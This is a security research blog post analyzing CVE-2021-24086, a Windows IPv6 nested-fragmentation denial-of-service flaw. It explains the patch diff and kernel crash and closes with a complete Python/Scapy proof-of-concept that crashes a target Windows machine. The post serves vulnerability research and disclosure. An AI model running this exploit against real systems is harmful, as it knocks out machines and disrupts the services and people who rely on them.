Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

In this blog post we analyze a denial of service vulnerability affecting the IPv6 stack of Windows. This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.

Introduction

On February 9th, 2021, Microsoft published a security patch addressing a denial of service vulnerability, identified as CVE-2021-24086, affecting the IPv6 stack of every version of Windows. The issue was caused by an improper handling of IPv6 fragments.

This blog post discusses the vulnerability and presents a proof-of-concept for it.

A primer on IPv6 fragmentation

In this section we briefly discuss how fragmentation works on IPv6. If you are new to this subject, you may want to read more about it at section 4.5 of RFC 8200.

In order to send a packet that is too large to fit in the maximum transmission unit (MTU) of the path to its destination, an IPv6 source node may divide the packet into fragments and send each fragment as a separate packet, to be reassembled at the receiver.

Fragmentation, which is a core feature of IPv6, is implemented via an Extension Header (the Fragment header, identified by protocol number 44). The Fragment header has the following format:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Next Header  |   Reserved    |      Fragment Offset    |Res|M|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Identification                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

When splitting a large packet in order to send it into multiple fragments, the original large packet is divided into the unfragmentable and the fragmentable parts.

  • The unfragmentable part is composed of those parts of the original packet that must be processed by intermediate nodes between the sender and the receiver. That includes the IPv6 header, plus any extension headers that need to be processed by nodes en route to the destination (e.g. Hop-by-Hop Options header, Destination Options header for intermediate destinations, and Routing header).
  • The fragmentable part is composed of those parts of the original packet that must be processed only at the final destination node. That includes all other extension headers that are not included in the unfragmentable part of the packet (e.g. Destination Option header for the final destination), the upper-layer header (e.g. ICMPv6, TCP, UDP), and the upper-layer payload.

Fragmentation process

Let's see with a practical example how an IPv6 packet is fragmented. Our example packet is composed of an IPv6 header, followed by a Hop-by-Hop Options header, followed by an ICMPv6 header and its payload.

  • The unfragmentable part consists of the IPv6 header plus the extension headers that must be processed by nodes en route to the destination (Hop-by-Hop Options header in this example).
  • The fragmentable part consists of the upper-layer header (ICMPv6 in this case) plus the ICMPv6 payload.

The fragmentable part of the original packet is divided into fragments that fit within the MTU of the path to the packet's destination. Then, the fragments are transmitted in separate "fragment packets", as shown below. Each fragment packet is comprised of the unfragmentable part, followed by a Fragment header, followed by a slice of the fragmentable part.

Reassembly process

When all the fragments arrive at the destination node, the receiver reassembles the original packet from the fragments:

  • The unfragmentable part of the reassembled packet is taken from the first fragment packet (excluding the Fragment header).
  • The fragmentable part of the reassembled packet is constructed from the fragments following the Fragment headers in each of the fragment packets.

The diagram below illustrates this process.

Binary diffing

McAfee Labs blog post states that "The root cause of this vulnerability is a NULL pointer dereference which occurs in Ipv6pReassembleDatagram. The crash occurs when reassembling a packet with around 0xffff bytes of extension headers. It should be impossible to send a packet with that many bytes in the extension headers according to the RFC, however this is not considered in the Ipv6pReceiveFragment function when calculating the unfragmented length".

tcpip!Ipv6pReassembleDatagram is the function in charge of reassembling the received fragmented packets. By performing a binary diff of this function we can spot the actual fix.

The function calculates the total size of the reassembled packet as the size of the IPv6 header + the size of the extension headers in the unfragmentable part + the size of the reassembled fragmentable part. In the patched version, on the right side of the image, we can identify a new sanity check that was added: if the size of the extension headers in the unfragmentable part + the size of the reassembled fragmentable part (held in the EDX register) is greater than 0xffff, then the function quickly bails out and deletes the reassembly set; otherwise, it goes on with the reassembly process.

(Click to enlarge the image)

We can also observe a change in the tcpip!Ipv6pReceiveFragment function, which seems to be a fix for this vulnerability as well: in the patched version, on the right side of the image, if the fragment being processed belongs to a packet that has been identified as a Jumbogram (meaning that its size is greater than 0xffff), then it bails out and calls IppSendError; otherwise, it continues processing the fragment.

(Click to enlarge the image)

Things looks pretty clear at this point: we need to craft a packet with approximately 0xffff bytes of extension headers in the unfragmentable part. But the length of the extension headers in the unfragmentable part is taken from just the first fragment packet, whose length is constrained by the MTU, so we can only put around 1500 bytes of extension headers in the unfragmentable part. So, how is it even possible to obtain such a huge length of extension headers?

Fragments within fragments

The answer to our question is nested fragments.

It turns out that you can put IPv6 fragments inside IPv6 fragments, and that will trigger a recursive packet reassembly. This is not something new: in fact, I took this idea from a presentation at the Troopers 2013 conference by researcher Antonios Atlasis, who has been abusing fragments and extension headers to conduct attacks against IPv6 stacks for a long time.

It's important to note that not all operating systems accept nested IPv6 fragments: Windows does, but some others such as FreeBSD don't.

In a graphical way, we can craft nested fragments by composing packets like this:

The tcpip!Ipv6pReceiveFragment function will process each one of the N outer fragments (identified by the ID 0x11111111 in this example). When the last outer fragment is received, it calls tcpip!Ipv6pReassembleDatagram to reassemble the original packet. The reassembled packet then will look like this:

Windows will notice that the reassembled part is basically another succession of fragments that need to be reconstructed, so that will trigger a recursive packet reassembly, to finally obtain the original packet:

Adding tons of extension headers

So, how can we leverage nested fragments to build a packet with around 0xffff bytes of extension headers in the unfragmentable part? It turns out that the constraint of extension headers being limited to around 1500 bytes that we observed on regular fragmented packets does not apply to packets reconstructed from nested fragments. In other words, we can put an arbitrary number of extension headers, as long as they belong to nested fragments.

We can build an inner packet like this:

Notice that we are using 0x1ffa Routing headers to achieve our target length of extension headers. An empty Routing header accounts for 8 bytes, so the total size of the extension headers in the unfragmentable part is 0xffd0, which is enough to trigger the bug. Including such a huge number of Routing headers is not possible under regular, non-nested fragments, because only the extension headers from the first fragment packet would count, and the first fragment packet is limited by the MTU of 1500 bytes. However, when dealing with nested fragments, there's no such thing as a "first fragment packet": the inner payload is arranged as a single, large chunk of bytes as a result of the reassembly of the outer fragments, and so there's no limit on the size of the extension headers.

The "first part" in the image above must be sent split into fragments, so it constitutes the nested fragments per se. On the other hand, the "second part" is just the last inner fragment, and it's not necessary to send it nested. In fact, while doing tests, I found out that this last inner fragment must not be sent nested together with the first part, otherwise the recursive reassembly is not triggered.

To summarize, the nested fragments needed to trigger the bug will look like this:

The crash

When tcpip!Ipv6pReassembleDatagram is recursively invoked to handle our nested fragments, it calls NdisGetDataBuffer to read length of extension headers + sizeof(IPv6_header) bytes from the NET_BUFFER structure holding our packet data. The length of our extension headers is 0xffd0 and the fixed size of the IPv6 header is 0x28, so it attempts to read 0xfff8 bytes.

Notice that the Storage parameter in that call is set to NULL. The NdisGetDataBuffer API documentation states that if the data in the NET_BUFFER is not contiguous, and if the Storage parameter is NULL, then the return value is NULL. This is exactly the case that we hit with our specially crafted length of extension headers: NdisGetDataBuffer returns NULL, and the returned NULL pointer (temporarily saved to the size_of_ext_headers_plus_sizeof_IPv6_hdr variable, as shown above highlighted in red) is dereferenced, causing a BSoD:

This is the crash information that we can observe in the kernel debugger:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: 0000000000000000, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000001, value 0 = read operation, 1 = write operation
Arg4: fffff80170b9937b, address which referenced memory


TRAP_FRAME:  fffff80171472960 -- (.trap 0xfffff80171472960)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffce0ae3366080
rdx=0000000000000002 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80170b9937b rsp=fffff80171472af0 rbp=ffffce0ae1cfe500
 r8=ffffce0ae353f980  r9=0000000000000001 r10=ffffce0ae4edf040
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na pe nc
tcpip!Ipv6pReassembleDatagram+0x14f:
fffff801`70b9937b 0f1100          movups  xmmword ptr [rax],xmm0 ds:00000000`00000000=????????????????????????????????
Resetting default scope

STACK_TEXT:
fffff801`71472af0 fffff801`70b9a122     : ffffce0a`e1ee7000 00000000`00000000 00000000`00000002 ffffb5e7`00010067 : tcpip!Ipv6pReassembleDatagram+0x14f
fffff801`71472b90 fffff801`70b9a242     : ffffce0a`e54399b0 fffff801`70bf0008 ffffce0a`e1be6810 ffffce0a`e355d4a0 : tcpip!Ipv6pReceiveFragment+0x84a
fffff801`71472c60 fffff801`70ab5316     : ffffce0a`00000001 ffffce0a`e1ee7000 ffffce0a`e33e42e0 ffffce0a`e1ee7000 : tcpip!Ipv6pReceiveFragmentList+0x42
fffff801`71472c90 fffff801`70a359ff     : fffff801`70bf3000 ffffce0a`e1a6b7e0 ffffce0a`e1ee7000 ffffce0a`e544fd00 : tcpip!IppReceiveHeaderBatch+0x7f0b6
fffff801`71472d90 fffff801`70a32d9c     : ffffce0a`e32b9380 ffffce0a`e33e4550 00000000`00000001 00000000`00000000 : tcpip!IppFlcReceivePacketsCore+0x32f
fffff801`71472eb0 fffff801`70a7efd0     : ffffce0a`e33e4550 00000000`00000000 fffff801`71472f81 00000000`00000000 : tcpip!IpFlcReceivePackets+0xc
fffff801`71472ee0 fffff801`70a7e5cc     : 00000000`00000001 ffffce0a`e36d4800 fffff801`70a71a50 fffff801`714732bc : tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x270
fffff801`71472fe0 fffff801`6e00d468     : ffffce0a`e1effba0 00000000`00000002 ffffce0a`e5474080 fffff801`714732d8 : tcpip!FlReceiveNetBufferListChainCalloutRoutine+0x17c
[...]

Proof of concept

The following Python code triggers the vulnerability, crashing the specified target machine:

import sys
import random

from scapy.all import *

FRAGMENT_SIZE = 0x400
LAYER4_FRAG_OFFSET = 0x8

NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086")
    er.cksum = 0xa472

    return raw(er)


def get_inner_packet(target_addr):
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
    raw_er = get_layer4()

    # 0x1ffa Routing headers == 0xffd0 bytes
    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))

    # First inner fragment header: offset=0, more=1
    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)

    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):

    raw_er = get_layer4()

    ip = IPv6(dst = target_addr)
    # Second (and last) inner fragment header: offset=1, more=0
    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])


def trigger(target_addr):

    inner_packet, inner_frag_id = get_inner_packet(target_addr)

    ip = IPv6(dst = target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)

    outer_frag_id = random.randint(0, 0xffffffff)

    fragmentable_part = []
    for i in range(len(inner_packet) // FRAGMENT_SIZE):
        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])

    if len(inner_packet) % FRAGMENT_SIZE:
        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])


    print("Preparing frags...")
    frag_offset = 0
    frags_to_send = []
    is_first = True
    for i in range(len(fragmentable_part)):
        if i == len(fragmentable_part) - 1:
            more = 0
        else:
            more = 1

        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)

        blob = raw(FH/fragmentable_part[i])
        frag_offset += FRAGMENT_SIZE

        frags_to_send.append(ip/hopbyhop/blob)


    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)


    print("Now sending the last inner fragment to trigger the bug...")
    send_last_inner_fragment(target_addr, inner_frag_id)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    trigger(sys.argv[1])

Conclusion

The root cause of this vulnerability is the fact that, when attempting to reassemble nested fragments, Windows counts all the extension headers included in the inner payload. On the contrary, when dealing with regular fragments, only the extension headers included in the very first fragment packet are counted; however, there's no such thing as "first fragment packet" when attempting a recursive reassembly of nested fragments - the inner payload is just a single, large chunk of bytes, as a result of the reassembly of the outer fragments.

Arguably, there's no real reason to support nested fragments. Unlike its IPv4 counterpart, on IPv6 intermediate nodes cannot fragment packets - only the sender can do it, and there's no reason for a legitimate IPv6 node to send fragments within fragments. Therefore, removing support for nested fragments (as some other operating systems already do) may be a better solution in the long term, since supporting such a complex feature for which there's little to no use may leave the door open for further vulnerabilities.

Regarding the impact of the vulnerability, it is limited to causing a BSoD on the target machines, thus resulting in a denial of service condition. However, since it affects all Windows IPv6 deployments under all Windows versions, the potential to cause service disruptions is high. It's also important to note that, as stated by Microsoft, Windows systems configured with only link-local IPv6 addresses are not reachable from the Internet; in that case, attacks can only originate from the local network.

Comments